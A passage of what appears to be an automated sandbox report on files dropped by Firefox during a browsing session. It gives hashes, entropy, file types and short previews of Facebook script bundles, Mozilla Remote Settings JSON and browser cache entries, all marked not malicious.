                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometSetDenseModeMutation_facebookRelayOperation",[],(function(a,b,c,d,e,f){e.exports="4486145264820781"}),null);.__d("CometSetDenseModeMutation.graphql",["CometSetDenseModeMutation_facebookRelayOperation"],(function(a,b,c,d,e,f){"use strict";a=function(){var a=[{defaultValue:null,kind:"LocalArgument",name:"input"}],c=[{alias:null,args:[{kind:"Variable",name:"input",variableName:"input"}],concreteType:"SetDenseModeResponsePayload",kind:"LinkedField",name:"set_dense_mode",plural:!1,selections:[{alias:null,args:null,concreteType:"Viewer",kind:"LinkedField",name:"viewer",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"dense_mode_setting",storageKey:null}],storageKey:null}],storageKey:null}];return{fragment:{argumentDefinitions:a,kind:"Fragment",metadata:null,name:"CometSetDenseModeMutation",selections:c,type:"Mutation",abstractKey:null},kind:"Request",operation:{argumentDefinitions:a,kind:"Operation",name:"CometSetDenseModeMutation",selections:
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ISO Media, Apple iTunes ALAC/AAC-LC (.M4A) Audio
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):22278
                                                                                                                                                                                  Entropy (8bit):6.212801708897808
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:j60I1WUgmIu6RM7VqN4mApqN3Xo70tNo+pwPm082nyFz/kRphRp/:jcWUgXApQHkKo+pwPo2VV/
                                                                                                                                                                                  MD5:7F8E33963042A04FE19019089CBC8B3B
                                                                                                                                                                                  SHA1:393E9A0A496E9ED1AED3DC643A008FF2A009C2FB
                                                                                                                                                                                  SHA-256:21C11177A11F20E1B0CED43AAAC23AE4D222D05168BF31CA1E2B6DB7053E5495
                                                                                                                                                                                  SHA-512:1FCB36F7C38F8CDCA26CE982CC565B84E3308F1E73A339683B617B64AE6D93712343D4A6A521B543EC8CF83DF62BE478F77C06549CC29D194099958172DD6DB3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:... ftypM4A ....M4A mp42isom........moov...lmvhd.............D..T.................................................@...................................trak...\tkhd....................T.................................................@...............mdia... mdhd.............D..T.U......"hdlr........soun.................[minf....smhd...........$dinf....dref............url ........stbl...gstsd...........Wmp4a.........................D.....3esds........"........@.............................stts....................stsc.......................hstsz...............................................n...f...`...k...j...f...h...a...i...e...i...b........stco................udta....meta......."hdlr........mdirappl.............oilst.....nam....data........got_it....cpil....data.............pgap....data.............tmpo....data.............(.too... data........iTunes 12.3.1.23....----....mean....com.apple.iTunes....name....iTunSMPB....data........ 00000000 00000840 000002AB 0000000000004915 000000
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):10349
                                                                                                                                                                                  Entropy (8bit):6.08600943799439
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:KM/TKAoHBneyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdu2Rdu2A:KM/TueLYGBRohB1r1uk/KiFTaIda9u
                                                                                                                                                                                  MD5:36B6A2DA66565EE633886B3FD97FF086
                                                                                                                                                                                  SHA1:6EE24DDEF3E27A919B2DB6FA117111FF626CB6FC
                                                                                                                                                                                  SHA-256:C71CDAF90A86DBC3979FFECC77E7B06F64D0DC4E8E26ABF93A9DBBFF1D075B6F
                                                                                                                                                                                  SHA-512:6974691973D73E82A811D65824B439B9975F8998A74A0134ECA93D829B3C6910B0B59154B356F5757EC67DADBEBF3FE16B50742F5A66C19E82D08296B45090ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","required":["id"],"properties":{"id":{"type":"string","default":"AddonManagerSettings","description":"The default id should NOT be changed, unless there is a specific need to create separate collection entries which target or exclude specific Firefox versions."},"filter_expression":{"type":"string","optional":true,"description":"This is NOT directly used by AMRemoteSettings, but has special functionality in Remote Settings.\nSee https://remote-settings.readthedocs.io/en/latest/target-filters.html#how"},"installTriggerDeprecation":{"$ref":"#/definitions/installTriggerDeprecation","optional":true}},"definitions":{"installTriggerDeprecation":{"type":"object","properties":{"extensions.InstallTrigger.enabled":{"type":"boolean","default":false,"description":"Show/Hide the InstallTrigger global completely (both the global and its methods will not be accessible anymore). IMPORTANT: The webcompat team should be consulted before turning this to false, becau
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12989
                                                                                                                                                                                  Entropy (8bit):6.04091430862057
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:Hhyu9fiGLm4pUVE0M6dtE0M6dwtL2Zl8lI:FBi8mCUVE56dtE56dwcR
                                                                                                                                                                                  MD5:EADA4FAE208B6B4976E22867563BD7C8
                                                                                                                                                                                  SHA1:D59258A2C4CEF63F4E44D1232892BFEF37B579AB
                                                                                                                                                                                  SHA-256:423B33014CC96D80C73DE8320C7D235B0EFA15A0995FF09BB484A17E137415CA
                                                                                                                                                                                  SHA-512:F3DD44475FAA4A80A0E17EE2F110CF6570AD3C00CF2E8E9C523BBCCB0FBFEBC55BAAE113F5F4643E5106488705340C9A85F45AB1423C4447DF9B7439E64B4179
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9349
                                                                                                                                                                                  Entropy (8bit):6.108152827038933
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Y1duwBNeyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdBORdBOX:ydeLYGBRohB1r1uk/KiFTaIdaEq
                                                                                                                                                                                  MD5:F41CC5246C854D2540DD5DD0E4A7BA16
                                                                                                                                                                                  SHA1:87B69ED55D7468713F1552343836B11EFE898B60
                                                                                                                                                                                  SHA-256:91BAB762FDAD34E5C4D2DC956FA3EADAFDE5AE6E65A300054FDA6CA45885F420
                                                                                                                                                                                  SHA-512:15018D31A387D28E10E03474AD06F0391545E551DD249B71DC8F1C3129AC63363C4D51E01C898C66A86609EAB0E24B36874766C8867B2B640F193E78C2551DF4
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"schema":{"type":"object","required":["description","hosts"],"properties":{"hosts":{"type":"array","items":{"type":"string"},"description":"List of hosts where this recipe applies."},"pathRegex":{"type":"string","description":"Match certain paths."},"description":{"type":"string","description":"Site description."},"passwordSelector":{"type":"string","description":"CSS selector of the password field."},"usernameSelector":{"type":"string","description":"CSS selector of the username field."},"notPasswordSelector":{"type":"string","description":"CSS selector to exclude fields as password."},"notUsernameSelector":{"type":"string","description":"CSS selector to exclude fields as username."}},"description":"Password recipes"},"signature":{"ref":"jdpt083xjysc3ibcann9jp9e8","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"PL0XYs
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8054
                                                                                                                                                                                  Entropy (8bit):6.041541613261199
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:VoMdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckALUcuALc:pWebV2GZuZrFK0k0t7qW0NbZovEplH
                                                                                                                                                                                  MD5:C1F176378BBDFED2A99DFCC1B8D48AAF
                                                                                                                                                                                  SHA1:0D6D8AE51E7E97F6710B25C4C0363494422CF5E0
                                                                                                                                                                                  SHA-256:974EBFC85E54E1535DE31B2E84FE6E6F02D6B0BE308EBC449894EAD04C98DFD2
                                                                                                                                                                                  SHA-512:C224D8877A7BA83D65AB79F41ACCD8EB2CEFA2BFAD7FC0EFB08174C650F22234FC7C5F834C601C265E1EABBAE53AE8AEABF10161D498070612A980D1BFDCA1EF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:............e...e...F.A.e...........a,~1708514993,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/messaging-system/1/4db4139f-6dcf-40ae-89c1-1ca4ca5a35ed.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:OpenPGP Public Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):247
                                                                                                                                                                                  Entropy (8bit):5.045525157708332
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:6mUiBNlXDOLUxGbsH3X8sXWzdsDvLUxGHFOCVGsDpHHXmOy/l:6mUiBNpGbmX8Qudu8GcvupnCl
                                                                                                                                                                                  MD5:9C2AB02619313EFF482E7E2DF5A38203
                                                                                                                                                                                  SHA1:3A8B2D6A8A69C66201CFB338BA4227BD7FA6ED21
                                                                                                                                                                                  SHA-256:2E668772B40CED67265D769BF53FB37B88163452D7848CBED08FD1B7EBE56660
                                                                                                                                                                                  SHA-512:ACDE74F6D43F1970E80CB2A96DF857CEC1FC262C1513717F6E0309AAE041C77A810553815E9B92C380D992767C13C77CBCFCEFF78B210FE683B6FE47465FF779
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.;.C........e...e...F..........+....~predictor-origin,:https://www.youtube.com/.predictor::seen.1.predictor::resource-count.2.predictor::https://www.youtube.com/.1,6,1708515099,4096.predictor::https://fonts.googleapis.com/.1,1,1708515099,4096.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2928148480
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):45836
                                                                                                                                                                                  Entropy (8bit):7.889969712591294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:XQjwuEDLNdnkuHplzB3AnWBhCiE4CgsmDe2tiryvAYEl7RKuFZrsb6gMp+tJP9MW:AjwBfP13zAyxXZiryC7RKawFQ+73OGr9
                                                                                                                                                                                  MD5:FE0AF762AE7E566C3D0A680291BF2F94
                                                                                                                                                                                  SHA1:E3EC2832A9B2C6EF39FBCD5873226979A8309FAD
                                                                                                                                                                                  SHA-256:B5ABBA911123955CA34F3D1B348E64138E3933A2D556043F411AFF37967AEF2A
                                                                                                                                                                                  SHA-512:2F50452725D7F7FE339804E4A4C8905748B13C7DBF6F3D93B40D04EBAEC61ECE13E16763ECF23DEA0E0B920FF3D42927442AC88580BBFCFD9C5906F82F701131
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:gzip compressed data, original size modulo 2^32 2114256896
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12267
                                                                                                                                                                                  Entropy (8bit):6.5998870739564905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:ir1RbJtt5z8Eq4ezmYmSmhZwTWvoglqYmSmhZwTWvogrxsMHJm4nOdAna0Axk0CA:sVVZqFFmzwTWvoglJmzwTWvogrBHJm24
                                                                                                                                                                                  MD5:B65DCB41B8F9A98F86C0A39DFAD1501C
                                                                                                                                                                                  SHA1:E69060C9A7FE93D0C146516C8A8508A22F8C534E
                                                                                                                                                                                  SHA-256:12856292FA01901E64512909618EAC9B0319A0DE078BA5123FE756CF960381B9
                                                                                                                                                                                  SHA-512:11FED9C639728139E5D98E94D65B73028FBDABD830B2709D08FE922049606DE7BF44CC29E02850B7E718FB540DB956E974B4DD434B397143ABCA002C04E6B50E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.684426660975954
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:OllSI67QPPTvX3XDkDKVInGTKlVX8sX3u+llln:KoEXLXDk5nGbsHHl/n
                                                                                                                                                                                  MD5:8029B5A0740E60927132A86747B2FCC1
                                                                                                                                                                                  SHA1:F8E9330E0161E2AA94A7FBC28DA4A92CA8990C83
                                                                                                                                                                                  SHA-256:A71F2C3B823A71C64DDA40A06F065F66E104564729650E38D867E54FD7BDD343
                                                                                                                                                                                  SHA-512:893BCBA43382B85A63F6966F78246FA10CD5EC92182B6F89679134F58603662931BFFB8479D9666CC32FD0AE8B52D519B9471BCEB5DE883E55C3CC947F458999
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...I........e...e...F.+........0....~predictor-origin,:https://accounts.youtube.com/.predictor::seen.1.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):11650
                                                                                                                                                                                  Entropy (8bit):6.049119123409141
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:hFs3i3P0tQB78eyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWd+7Dmd+79:hFs3i3ctbeLYGBRohB1r1uk/KiFTaIdV
                                                                                                                                                                                  MD5:FDD46B8D3089E0893E15A34164A1410A
                                                                                                                                                                                  SHA1:D5D3BD3B72454C5257D8157E3325F17E7862304F
                                                                                                                                                                                  SHA-256:07F14CF52AD4F2A82702A4DFB21372F8B5F2925BEDA33999D24919C4D170E5FF
                                                                                                                                                                                  SHA-512:61D48F4FE55A7D9AF4FB41E6FE807483E978D19C4F12E9CDB0E12EA87B033BEF5174F969D5D5F7B03D151A8880A46AD68C1033770985D97E2505559A6AD937E8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","required":["url","order"],"properties":{"url":{"type":"string","title":"URL","description":"URL of the top site."},"order":{"type":"number","title":"Presentation order","description":"Presentation order of the top site."},"title":{"type":"string","title":"Title","description":"Title of the top site."},"exclude_locales":{"type":"array","items":{"type":"string","minLength":2},"title":"Exclude locales","minItems":0,"description":"List of locales to exclude (BCP 47 format, eg. \"de-AT\", \"fr-CA\").","uniqueItems":true},"exclude_regions":{"type":"array","items":{"type":"string","minLength":2},"title":"Exclude regions","minItems":0,"description":"List of regions to exclude (eg. \"FR\", \"CN\").","uniqueItems":true},"include_locales":{"type":"array","items":{"type":"string","minLength":2},"title":"Include locales","minItems":0,"description":"List of locales to include (BCP 47 format, eg. \"de-AT\", \"fr-CA\"). Set n
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PEM certificate
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):13000
                                                                                                                                                                                  Entropy (8bit):6.043904617461632
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:HR3u9fiGLm4pUEE0M6dfrKcD/TaIdq6/9/x:UBi8mCUEE56dWcXa8q6Vp
                                                                                                                                                                                  MD5:5F1587BD253AEE5EAD95FD818AEF4883
                                                                                                                                                                                  SHA1:4B6A732272997892BD0DA61CF1ECFE8ACEDBF7F1
                                                                                                                                                                                  SHA-256:1D9C5816B9DEE4077B251AAE0C89AA162E2829116CF4BF3BB5AE289CE2D9E7B4
                                                                                                                                                                                  SHA-512:66187DAE2254D669286662DBFF837CCBAD92D388F8AF93B89152A6A39AC58315747598E0F0BCB5C3004369C761A12F0BCF6A65B9AE71A2876AF4EA36BD3E34DF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18351
                                                                                                                                                                                  Entropy (8bit):6.564546574451141
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:WFmsrJF7VqN4mApqN3Xo70tNo+pwPm082nyFz/hY4:W6ApQHkKo+pwPo20
                                                                                                                                                                                  MD5:718249B7D3CD70E38C5A19D1DEF019E6
                                                                                                                                                                                  SHA1:ACA42C083E6E1BAED430E371A9F5F8D00F724662
                                                                                                                                                                                  SHA-256:880C7828CAB97B040546078AD80E261D9BE49A6FE96956EF782B31BE276CA7A7
                                                                                                                                                                                  SHA-512:18C6F18C4A6B8D6EB0E780CE4833966D03F8811C43CA238D7992511420EDB870964B86B02BA117D0F1E0CDEB36ECF461FAA1B088F09469BDEF4C810BF35D7A89
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):8046
                                                                                                                                                                                  Entropy (8bit):6.040605419205688
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:WB6MdWebgQX2GZaRZEyFYpoGAVQUy0tikpxgMIRGXpMbm5uZGebZovEckcLUcucI:MxWebV2GZuZrFK0k0t7qW0NbZovEpR7
                                                                                                                                                                                  MD5:B024649BC8FE74B0A2B8B4647DB8DBF3
                                                                                                                                                                                  SHA1:6254A80EF12E13AA180E80A72BDF15E9613A0ACF
                                                                                                                                                                                  SHA-256:0A7B68BFE77A86B39DE515625C4ACE64CDBA04DB61A41FC1F6D50D370DB7C5F4
                                                                                                                                                                                  SHA-512:0CA9322656F9EE9D54B351945ED346ABDBF3F3690825334F31A113E29045CD62694169499E252851EB15B02550ED5AB30A4744A44A2E5EE554D4654E35C9F82D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:\.).........e...e...F.A.e......|....a,~1708514999,:https://incoming.telemetry.mozilla.org/submit/firefox-desktop/baseline/1/967d9d50-f397-49d3-8ec0-e15f2a105ac0.strongly-framed.1.security-info.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
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):12848
                                                                                                                                                                                  Entropy (8bit):6.019131239165607
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:8HVWJabcHeLYGBRohB1r1uk/KiFTaIdaHD:aWJabcHe8GvIDuuKOa8w
                                                                                                                                                                                  MD5:C060F2A40B616B0036624C9DEF4581B5
                                                                                                                                                                                  SHA1:D38B3FFC4CF456D997B5790A4C4BB6CDEABE0345
                                                                                                                                                                                  SHA-256:D8A6F70A53B90C56A99B5DF125DC44F412F33CA0848859A1A4E8EE69FBD5A457
                                                                                                                                                                                  SHA-512:7F9F170F372A3FB408145BD58CDF2AA40CBE4AF638ABC84066C5F523BFADDDDFA9BB2A4F788EFACA1D3BE3D882C835AE1456C34CD9063871E640F068E0AA1270
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","title":"Gfx","default":{"os":"","vendor":"","devices":[],"feature":"","hardware":"","driverVendor":"","driverVersion":"","featureStatus":"","windowProtocol":"","driverVersionMax":"","desktopEnvironment":"","driverVersionComparator":""},"required":["os","vendor","featureStatus"],"properties":{"os":{"enum":["","All","Android","Darwin 9","Darwin 10","Darwin 11","Darwin 12","Darwin 13","Darwin 14","Darwin 15","Darwin 16","Darwin 17","Darwin 18","Darwin 19","Darwin 20","Linux","WINNT 5.1","WINNT 5.2","WINNT 6.0","WINNT 6.1","WINNT 6.2","WINNT 6.3","WINNT 8.1","WINNT 10.0","Other"],"type":"string","title":"OS","description":"The operating system identifier."},"vendor":{"type":"string","title":"Vendor","description":"A vendor identifier, eg. 0x1002"},"blockID":{"type":"string","title":"Internal blocklist id","pattern":"^g[0-9]+$","description":"Original block id, eg. g28"},"details":{"type":"object","title":"Details"
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):114
                                                                                                                                                                                  Entropy (8bit):4.680522047781059
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:4pqOwllZRtEtqiBMqEcldnX9XHWwrRzcSLYXqhHK//l:HNlTKiclpJWw9LYX2Kl
                                                                                                                                                                                  MD5:443F7AB19C3AF2A87FC04E037CD3CCEA
                                                                                                                                                                                  SHA1:E191165DEA7264BF984A3FEE526B708D32528924
                                                                                                                                                                                  SHA-256:9B98680185C873516C9A408EF8CACB468EC400971A923BF6C85F29C74BCC7E5F
                                                                                                                                                                                  SHA-512:0974F1E1A557305326767D715312CF6DCAEDC1AAE3C89C31F8BEB4D748B3FE4CCE4B4D8E5CE65E82ED5E96DF23B7F87FD096C091E45BB8FE624D76B0E127679F
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:=...........e..................I....O^partitionKey=%28https%2Cfacebook.com%29,:https://www.facebook.com/video.....
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9550
                                                                                                                                                                                  Entropy (8bit):6.103099559930167
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:wcT83kB3meyheEVGq8BRwtkQpSISkrJAy/Gk/KimiHfbaI8j3qWdps+dpss:zTKameLYGBRohB1r1uk/KiFTaIdaNl
                                                                                                                                                                                  MD5:0AD02F1561ACA48E3201FF1AC027AB4B
                                                                                                                                                                                  SHA1:4933E8CD39C93846D5530E0A123C86ADFCB663B0
                                                                                                                                                                                  SHA-256:52931AAA0895D8FED5BFDCC103C1BB5E0D99F5C2999563BEAF51CC68EC906EA0
                                                                                                                                                                                  SHA-512:730B9513971C0A68C9B77F04106E89DB826CCDE7F9F34CE9384682528183A9638391A73A7E9C9F1736FDC3E60F6915792B0CED22089A88A8A24302BA59D5672B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"permissions":{},"data":{"sort":"-last_modified","schema":{"type":"object","properties":{"name":{"type":"string","title":"Name","description":"The name of the device (e.g. Nexus 5X, \u2026)"},"touch":{"type":"boolean","title":"Touch Screen","description":"Indicate if the device has touch capabilities"},"width":{"type":"integer","title":"Width","description":"The viewport width of the device"},"height":{"type":"integer","title":"Height","description":"The viewport height of the device"},"featured":{"type":"boolean","title":"Featured","description":"Whether or not the device will be displayed in Responsive Design devices list"},"userAgent":{"type":"string","title":"User Agent","description":"The user agent that will be applied when selecting the device"},"pixelRatio":{"type":"number","title":"DPR","description":"Pixel ratio of the device"}}},"signature":{"ref":"1u4ofa2gtcmvz2bdxfc0ezv6gq","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17271
                                                                                                                                                                                  Entropy (8bit):5.9481495283342
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:M7DhRTDa19teLYGBRohB1r1uk/KiFTaIdact:ehRPQe8GvIDuuKOa8N
                                                                                                                                                                                  MD5:631970C344B8C2E57B1A0C8537F5F167
                                                                                                                                                                                  SHA1:97B0E5E7E18D71AF360C4EAE0D60F6E56F424DA7
                                                                                                                                                                                  SHA-256:86B03708D429AFB318500E28B41791503528958A4D9E084ACA6EC8AAD8CE9D5E
                                                                                                                                                                                  SHA-512:F0726C554E95D0BD479897D15DB55387AB9314224282BF537941C9A8D5EF4C88A46BF370381E4D060CE076E83CFBD9CDC0586A98A7C9FFB9BBC5C2D935D5EE75
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"metadata":{"schema":{"type":"object","properties":{"attachment":{"type":"object","title":"The attachment itself","properties":{"hash":{"type":"string","title":"Hash"},"size":{"type":"number","title":"Size (bytes)"},"filename":{"type":"string","title":"Filename"},"location":{"type":"string","title":"URL"},"mimetype":{"type":"string","title":"MIME type"},"original":{"type":"object","title":"Pre-gzipped file","properties":{"hash":{"type":"string","title":"Hash"},"size":{"type":"number","title":"Size (bytes)"},"filename":{"type":"string","title":"Filename"},"mimetype":{"type":"string","title":"MIME type"}},"additionalProperties":false}},"description":"Information about the attached file.","additionalProperties":false}}},"signature":{"ref":"20crxvapq0ey22q46vbomp9qde","x5u":"https://content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2024-03-20-10-07-03.chain","mode":"p384ecdsa","type":"contentsignaturepki","signature":"-fFx2lu100c4E7TZuWZw-cihVAUy2b6f
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (8178)
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):88440
                                                                                                                                                                                  Entropy (8bit):5.71507312271413
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:qgd6FF6U5v/FSisNk3a+awDbDit1/Wxm4oVxmb5EhI5iCHOa3s6J8MTN:qFs1/WxmAShI5rHds6J8MTN
                                                                                                                                                                                  MD5:C6E61EF115E174AB74B92BDC7B8D5C34
                                                                                                                                                                                  SHA1:13F44FFEF55F4A12D6E8F9CF74491176949C88B7
                                                                                                                                                                                  SHA-256:7BD5F38D7058CFC9A26C26489D97ACB0E1B20AB11F95DF85D39C5AD9FA82A8E2
                                                                                                                                                                                  SHA-512:782EFB93C16333BBA6C8FC2328600305F10F608D7A84B2A758CEBA4D3FA80CC7F8CC80322848B5D38BA61625B77B1592F66461325E247F2115629260A6562DE3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometTextWithEntitiesRelay_entity.graphql",[],(function(a,b,c,d,e,f){"use strict";a=function(){var a={alias:null,args:null,concreteType:"WorkForeignEntityInfo",kind:"LinkedField",name:"work_foreign_entity_info",plural:!1,selections:[{alias:null,args:null,kind:"ScalarField",name:"type",storageKey:null}],storageKey:null},b={kind:"Variable",name:"scale",variableName:"scale"},c={alias:null,args:null,kind:"ScalarField",name:"height",storageKey:null},d={alias:null,args:null,kind:"ScalarField",name:"uri",storageKey:null},e={alias:null,args:null,kind:"ScalarField",name:"width",storageKey:null},f={alias:null,args:null,kind:"ScalarField",name:"name",storageKey:null};return{argumentDefinitions:[{kind:"RootArgument",name:"scale"}],kind:"Fragment",metadata:{mask:!1},name:"CometTextWithEntitiesRelay_entity",selections:[{alias:null,args:null,kind:"ScalarField",name:"__typename",storageKey:null},{alias:null,args:[{kind:"Literal",name:"site",value:"comet"}],kind:"ScalarField",na
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):17862
                                                                                                                                                                                  Entropy (8bit):6.52536657734414
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:7V7QlXWn7VqN4mApqN3Xo70tNo+pwPm082nyFz/aio:Z8lXWcApQHkKo+pwPo2B
                                                                                                                                                                                  MD5:FB4027F18C0B23E77F2E37BF52D5643E
                                                                                                                                                                                  SHA1:F01D9C66591C6AE09B87EF9F1B565434FFB883B9
                                                                                                                                                                                  SHA-256:DBA7E5487340301ED9C38D56AECE4CFD81FBC2BF685029B6D2F73DBEB93EA1FE
                                                                                                                                                                                  SHA-512:1A333007599C204F5AF702AAEB64E0BC8D63569EC62C6477038ADACE01801CB7768FADD12F680CCCCCCAF8119F4D5B0DA6CD2AC6FE4376E49789AA85E1BAD73D
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):19837
                                                                                                                                                                                  Entropy (8bit):6.805402059636057
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:zyAna1ISp7VqN4mApqN3Xo70tNo+pwPm082nyFz/atH:mAJApQHkKo+pwPo2R
                                                                                                                                                                                  MD5:92E25553F3149AFCEB941866173D4191
                                                                                                                                                                                  SHA1:3FDE9527F991C81C2F9011347C3282110238FC2E
                                                                                                                                                                                  SHA-256:9E2B756A6B19CB7C7AD05D6C7C058972FC64D9BFD5AF1BA48E07F21F214FF902
                                                                                                                                                                                  SHA-512:3C3086A8BFE49451871C4D8CD1B69619CA77B959D0D17CD7FE2677332BD135A573921CFCE7BCE0C9C7FE2AB1B4D37DC61B543313D3C1632E04FEF76E4E68DD2B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):107
                                                                                                                                                                                  Entropy (8bit):4.562912914800682
                                                                                                                                                                                  Encrypted:false
